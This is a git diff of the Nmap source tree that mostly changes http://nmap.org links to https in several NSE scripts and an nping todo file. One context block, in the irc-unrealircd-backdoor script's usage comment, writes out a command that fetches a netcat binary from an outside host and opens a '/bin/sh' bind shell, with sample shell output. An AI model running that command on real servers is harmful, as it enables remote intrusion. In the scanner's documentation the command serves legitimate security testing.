diff --git a/scripts/broadcast-ospf2-discover.nse b/scripts/broadcast-ospf2-discover.nse index 62b246efe..ad3fca08b 100644 --- a/scripts/broadcast-ospf2-discover.nse +++ b/scripts/broadcast-ospf2-discover.nse @@ -48,7 +48,7 @@ the script will fail unless a single interface is present on the system. -- author = "Emiliano Ticci" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"broadcast", "discovery", "safe"} prerule = function() diff --git a/scripts/cics-user-brute.nse b/scripts/cics-user-brute.nse index 5320d4c6c..2e824419e 100644 --- a/scripts/cics-user-brute.nse +++ b/scripts/cics-user-brute.nse @@ -35,7 +35,7 @@ CICS User ID brute forcing script for the CESL login screen. -- 2017-01-23 - v0.3 - Rewrote script to use fields and skip enumeration to speed up testing author = "Philip Young aka Soldier of Fortran" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"intrusive", "brute"} portrule = shortport.port_or_service({23,992}, "tn3270") diff --git a/scripts/deluge-rpc-brute.nse b/scripts/deluge-rpc-brute.nse index 45a5f08ad..ea6c726a7 100644 --- a/scripts/deluge-rpc-brute.nse +++ b/scripts/deluge-rpc-brute.nse @@ -24,7 +24,7 @@ Performs brute force password auditing against the DelugeRPC daemon. -- |_ Performed 8 guesses in 1 seconds, average tps: 8 author = "Claudiu Perta " -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"intrusive", "brute"} portrule = shortport.port_or_service(58846, "deluge-rpc") diff --git a/scripts/http-grep.nse b/scripts/http-grep.nse index 9056d9346..84cb2308d 100644 --- a/scripts/http-grep.nse +++ b/scripts/http-grep.nse @@ -20,16 +20,14 @@ The script searches for email and ip by default. -- nmap -p 80 www.example.com --script http-grep --script-args='match="[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?",breakonmatch' -- nmap -p 80 www.example.com --script http-grep --script-args 'http-grep.builtins ={"mastercard", "discover"}, http-grep.url="example.html"' -- @output --- PORT STATE SERVICE REASON --- 80/tcp open http syn-ack -- | http-grep: --- | (1) http://nmap.org/book/man-bugs.html: +-- | (1) https://nmap.org/book/man-bugs.html: -- | (1) email: -- | + dev@nmap.org --- | (1) http://nmap.org/book/install.html: +-- | (1) https://nmap.org/book/install.html: -- | (1) email: -- | + fyodor@nmap.org --- | (16) http://nmap.org/changelog.html: +-- | (16) https://nmap.org/changelog.html: -- | (7) ip: -- | + 255.255.255.255 -- | + 10.99.24.140 @@ -48,7 +46,7 @@ The script searches for email and ip by default. -- | + president@whitehouse.gov -- | + haesslich@loyalty.org -- | + rchong@fcc.gov --- | (6) http://nmap.org/5/#5changes: +-- | (6) https://nmap.org/5/#5changes: -- | (6) ip: -- | + 207.68.200.30 -- | + 64.13.134.52 @@ -76,17 +74,17 @@ The script searches for email and ip by default. -- visa, amex, ssn and ip addresses. If you just put in script-args http-grep.builtins then all will be enabled. -- -- @xmloutput --- +--
--
-- + dev@nmap.org --
-- --- +--
--
-- + fyodor@nmap.org --
-- --- +--
--
-- + 255.255.255.255 -- + 10.99.24.140 @@ -108,7 +106,7 @@ The script searches for email and ip by default. -- + rchong@fcc.gov --
-- --- +--
--
-- + 207.68.200.30 -- + 64.13.134.52 diff --git a/scripts/irc-unrealircd-backdoor.nse b/scripts/irc-unrealircd-backdoor.nse index 0c7a21d51..ade7ae1e6 100644 --- a/scripts/irc-unrealircd-backdoor.nse +++ b/scripts/irc-unrealircd-backdoor.nse @@ -17,7 +17,7 @@ netcat listener as demonstrated here: $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' $ ncat -vv localhost 4444 - Ncat: Version 5.30BETA1 ( http://nmap.org/ncat ) + Ncat: Version 5.30BETA1 ( https://nmap.org/ncat ) Ncat: Connected to 127.0.0.1:4444. pwd /home/ron/downloads/Unreal3.2-bad diff --git a/scripts/ssh-publickey-acceptance.nse b/scripts/ssh-publickey-acceptance.nse index 1023d9c33..db903223b 100644 --- a/scripts/ssh-publickey-acceptance.nse +++ b/scripts/ssh-publickey-acceptance.nse @@ -37,7 +37,7 @@ authentication. -- @args publickeydb Specifies alternative publickeydb author = "Devin Bjelland" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"auth", "intrusive"} local privatekeys = stdnse.get_script_args "ssh.privatekeys" diff --git a/scripts/ssh-run.nse b/scripts/ssh-run.nse index dd423bcc7..12f3aa406 100644 --- a/scripts/ssh-run.nse +++ b/scripts/ssh-run.nse @@ -33,7 +33,7 @@ Runs remote command on ssh server and returns command output. author = "Devin Bjelland" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = { 'intrusive', diff --git a/todo/nping.txt b/todo/nping.txt index 2388e16c5..c1130cf30 100644 --- a/todo/nping.txt +++ b/todo/nping.txt @@ -136,7 +136,7 @@ luis@Aberdeen:~$ sudo nping --ec public echo.nmap.org -p90-92 --tcp --count 1 --no-capture - Starting Nping 0.5.52.IPv6.Beta2 ( http://nmap.org/nping ) at 2011-07-05 12:53 CEST + Starting Nping 0.5.52.IPv6.Beta2 ( https://nmap.org/nping ) at 2011-07-05 12:53 CEST SENT (7.3302s) TCP 163.117.203.253:18554 > 74.207.244.221:90 S ttl=64 CAPT (7.4625s) TCP 163.117.203.253:18554 > 74.207.244.221:90 S ttl=54 SENT (8.3309s) TCP 163.117.203.253:18554 > 74.207.244.221:91 S ttl=64 @@ -154,7 +154,7 @@ luis@Aberdeen:~$ sudo nping --ec public echo.nmap.org -p90 --tcp --count 1 - Starting Nping 0.5.52.IPv6.Beta2 ( http://nmap.org/nping ) at 2011-07-05 12:51 CEST + Starting Nping 0.5.52.IPv6.Beta2 ( https://nmap.org/nping ) at 2011-07-05 12:51 CEST SENT (1.8965s) TCP 163.117.203.253:64288 > 74.207.244.221:90 S ttl=64 CAPT (2.0293s) TCP 163.117.203.253:64288 > 74.207.244.221:90 S ttl=54 RCVD (2.1233s) TCP 74.207.244.221:90 > 163.117.203.253:64288 RA ttl=51 @@ -784,7 +784,7 @@ sudo nping --arp 192.168.240.139 -vvv -d1 -Starting Nping 0.5.59BETA1 ( http://nmap.org/nping ) at 2011-07-11 12:32 CEST +Starting Nping 0.5.59BETA1 ( https://nmap.org/nping ) at 2011-07-11 12:32 CEST BPF-filter: arp and arp[6]==0x00 and arp[7]==0x02 SENT (0.0562s) ARP who has 192.168.240.139? Tell 192.168.240.1 0000 ff ff ff ff ff ff 00 50 56 c0 00 01 08 06 00 01 .......PV.......